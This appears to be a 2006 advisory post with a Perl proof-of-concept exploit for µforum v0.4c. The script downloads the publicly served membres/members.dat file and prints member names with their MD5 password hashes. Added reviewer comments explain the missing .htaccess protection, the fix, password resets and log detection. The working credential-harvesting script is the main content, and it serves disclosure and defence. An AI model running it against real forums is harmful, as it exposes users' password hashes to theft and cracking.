µforum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc Sep 01 2006 03:53PM
gmdarkfig gmail com
#!/usr/bin/perl

#

# Affected.scr..: µforum v0.4c

# Poc.ID........: 08060901

# Type..........: Members' passwords are stored in a .dat file that is not protected by a .htaccess file

# Risk.level....: Medium

# Vendor.Status.: Unpatched

# Src.download..: comscripts.com/scripts/php.forum.1568.html

# Poc.link......: acid-root.new.fr/poc/08060901.txt

# Credits.......: DarkFig

#

use LWP::UserAgent;

use HTTP::Request;

use Getopt::Long;

use strict;

# Reviewer summary (defensive reading of this proof of concept):
#   * The script sends one unauthenticated HTTP GET for
#     <host><path>membres/members.dat and prints what it parses out of the body.
#   * The root cause, per the header above, is that the member data file is
#     served directly by the web server. The fix is on the server side: deny
#     HTTP access to the membres/ directory (the .htaccess rule the advisory
#     says is missing) or keep the file outside the document root.
#   * Per the advisory title the exposed values are MD5 password hashes. MD5 is
#     a fast hash, so members of an exposed forum should be treated as
#     compromised and have their passwords reset.
#   * Detection: look in access logs for successful GETs of
#     membres/members.dat; this script sends the bare User-Agent "Mozilla".

# Banner only; no effect on the request.
print STDOUT "\n+", '-' x 36, "+\n";

print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";

print STDOUT '+', '-' x 36, "+\n";

# Command-line options, all string-valued: target host, forum path, and an
# optional HTTP proxy URL with proxy user/password.
my($host,$path,$proxh,$proxu,$proxp);

# NOTE(review): the GetOptions result in $opt is never checked in this script,
# and there is no check that --host was supplied at all.
my $opt = GetOptions(

'host=s' => \$host,

'path=s' => \$path,

'proxh=s' => \$proxh,

'proxu=s' => \$proxu,

'proxp=s' => \$proxp);

# Default the forum path to the web root.
if(!$path) {$path = '/';}

# Build the URL of the member data file by plain string concatenation.
$host .= $path.'membres/members.dat';

# Prepend the scheme unless the string already contains "http".
# NOTE(review): the pattern is unanchored, so "http" anywhere in the host or
# path (not only a leading scheme) suppresses the prefix.
if($host !~ /http/) {$host = 'http://'.$host;}

# HTTP client: fixed User-Agent "Mozilla", 30-second timeout.
my $ua = LWP::UserAgent->new();

$ua->agent('Mozilla');

$ua->timeout(30);

# Route http:// requests through the proxy when --proxh is given.
$ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);

# Proxy Basic credentials are attached only when --proxp is set; a --proxu
# given without a password is ignored.
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $res = $ua->request($req);

# NOTE(review): the response status is never inspected, so the body of an
# error page (403/404) is parsed the same way as the real file. A server that
# denies access to the file simply yields no matching output below.
my $dat = $res->content;

# The body is split on ':' and each piece is matched independently.
# Presumably the file is PHP serialize() output (s:N:"value";...) -- TODO
# confirm against the application; the script itself only relies on the
# quoted-value patterns below.
my @tabl= split(/:/, $dat);

foreach (@tabl) {

# A quoted value immediately followed by ;a starts a new output line and is
# printed with a '::' separator (apparently the member name -- not verifiable
# from this page).
if($_ =~ /"(.*)";a/){

print "\n".$1.'::';}

# A quoted run of exactly 32 characters from [a-z0-9] followed by ;i is
# printed as-is. The class is wider than hex, but per the advisory title the
# intended match is an MD5 hex digest.
if($_ =~ /"([a-z0-9]{32})";i/){

print $1;}

}

print "\n";

exit(0);
